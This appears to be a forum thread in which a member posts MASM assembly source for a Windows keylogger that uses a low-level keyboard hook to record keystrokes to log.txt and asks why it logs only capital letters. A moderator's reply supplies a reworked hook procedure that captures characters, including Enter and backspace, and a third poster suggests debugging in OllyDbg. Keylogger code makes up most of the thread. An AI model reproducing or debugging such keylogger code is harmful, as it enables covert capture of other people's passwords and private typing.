|
Forum
|
|
|
ASM Keylogger need help, he strange thing is when im invoking WriteFile in the WndProc procedure my keylogger works fine, but only get CHAR from window
|
|
| polishgang |
|
New Member
Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09
|
Hello Guys i�ve got a problem with my keylogger.It only logs big letters and does not log the key ENTER. The strange thing is when im invoking WriteFile in the WndProc procedure my keylogger works fine, but only get CHAR from my window.... This is the Keyboard Proc http://msdn.microsoft.com/en-us/library/ms644984%28VS.85%29.aspxI dont know where the problem is Sorry for my english and CODE. Here is my code.. hope someone can help me Thx alot | CODE | ; Autor Polish-Gangsta|Dawid
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include gdi32.inc
includelib user32.lib � �
include kernel32.inc
includelib kernel32.lib
includelib gdi32.lib
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
.const
MEMSIZE equ 65535
.DATA
ClassName db "Radonia4ever",0 � �
AppName db "PG greets Polska",0 � �
dateiname db "log.txt",0
tastaturEingaben db "Dawid",0
zeilenumbruch WORD 0A0Dh
.DATA?
hInstance HINSTANCE ? � � �
CommandLine LPSTR ?
hFile HANDLE ? � � �
hMemory HANDLE ? � � �
pMemory DWORD ? � � �
SizeReadWrite DWORD ? �
.CODE
start:
invoke GetModuleHandle, NULL � �
mov hInstance,eax
mov hInstance,eax
invoke GetCommandLine � �
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess, eax � �
KeyBoard proc nCode:DWORD, wParam:DWORD, lParam:DWORD
mov � � eax, wParam
� � � �cmp � � eax, WM_KEYUP � � � � �; only need WM_KEYDOWN
� � � �je � � �next_hook �
cmp � � eax, WM_SYSKEYUP � � �; only Need WM_SYSKEYDOWN
� � � �je � � �next_hook � � � �
� � � invoke MessageBoxEx,nCode,ebx,ebx,MB_OK,LANG_GERMAN
�invoke SetFilePointer,hFile,0,0,FILE_END
.IF wParam==13 � �
�invoke WriteFile,hFile,ADDR zeilenumbruch,sizeOf zeilenumbruch,ADDR SizeReadWrite,0
.ELSE
�invoke WriteFile,hFile,ebx,1,ADDR SizeReadWrite,0
.ENDIF
�
� � �;invoke MessageBoxEx,nCode,edi,edi,MB_OK,LANG_GERMAN
next_hook:
invoke CallNextHookEx,KeyBoard,nCode,wParam,lParam
ret
KeyBoard endp
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX � � �
LOCAL msg:MSG
LOCAL hwnd:HWND
;Datei laden
invoke CreateFile,ADDR dateiname,\
GENERIC_WRITE ,\
FILE_SHARE_WRITE,\
NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,\
NULL
mov hFile,eax
;invoke SetEndOfFile,hFile
invoke SetWindowsHookEx,WH_KEYBOARD_LL,addr KeyBoard,hInst,NULL;hook registrieren
mov wc.cbSize,SIZEOF WNDCLASSEX �
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc �
invoke CreateWindowEx,NULL,\
ADDR ClassName,\
ADDR AppName,\
WS_OVERLAPPEDWINDOW,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
NULL,\
NULL,\
hInst,\
NULL
mov hwnd,eax
invoke ShowWindow, hwnd,CmdShow �
invoke UpdateWindow, hwnd � �
.WHILE TRUE � � �
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam � �
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL ps:PAINTSTRUCT
LOCAL hdc:HDC
.IF uMsg==WM_DESTROY
�invoke UnhookWindowsHookEx,KeyBoard
�invoke PostQuitMessage,NULL �
.ELSEIF uMsg==WM_KEYUP
.ELSEIF uMsg==WM_PAINT
�invoke BeginPaint,hWnd, ADDR ps
�mov hdc,eax
�invoke TextOut,hdc,0,0,ADDR wParam,sizeOf tastaturEingaben �
�invoke EndPaint,hWnd, ADDR ps
.ELSE
�invoke DefWindowProc,hWnd,uMsg,wParam,lParam; Standard Nachrichtenverarbeitung �
�ret
.ENDIF
xor eax,eax
ret
WndProc endp
invoke CloseHandle,eax
end start |
|
| |
|
|
|
| ragdog |
|
Extremely Active Member
Group: Moderators
Posts: 891
Member No.: 5019
Joined: 13-May 07
|
Hi
What make your ebx?
here is a simply solution
| CODE | KbdProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
� � �invoke CallNextHookEx,hHook,nCode,wParam,lParam
� � �mov eax,lParam
� � �mov ebx,[eax+4]
� � �.if ebx==WM_CHAR
� � � invoke CreateFile,ADDR fname,FILE_APPEND_DATA, FILE_SHARE_WRITE or FILE_SHARE_READ,\
� � � � � � � � � �NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_ARCHIVE ,NULL
� � � mov fh,eax
� � � mov ecx,lParam
� � � add ecx,8;; get pointer to ascii code of char
� � � mov ebx,[ecx]
� � � mov char,ebx
� � � and char,0ffh;; need first 8 bits
� � � .if char == 13;; enter
� � � �mov char,10
� � � .elseif char == 8;; backspace
� � � �mov char,'~'
� � � .endif
� � � invoke WriteFile,fh,addr char,1,ADDR fl,NULL
� � � invoke CloseHandle,fh
� � �.endif
� � �xor eax,eax
� � �ret
KbdProc endp |
|
| |
|
|
|
| polishgang |
|
New Member
Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09
|
THX RAGDOG for ur post and time!!  nice community i will study ur code ------------------------------------ ive tried ur code but its still the same problem.... the letters are BIG and nothing changed.  And ive got 2 question s
how do u know thats the 2nd parameter?
| QUOTE | | add ecx,8;; get pointer to ascii code of char |
and how do u know this? thx for reply 
|
| |
|
|
|
| EnFeR RoI |
|
Member
Group: Members
Posts: 20
Member No.: 30972
Joined: 15-January 10
|
I think you should use OLLYDBG to understand the working of code of Keylogger project made by you. Hope it help you!!  EnFeR RoI.
|
| |
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
Track this topic
Receive email notification when a reply has been made to this topic and you are not active on the board.
Subscribe to this forum
Receive email notification when a new topic is posted in this forum and you are not active on the board.
Download / Print this Topic
Download this topic in different formats or view a printer friendly version.
|
|
|
Close Topic Options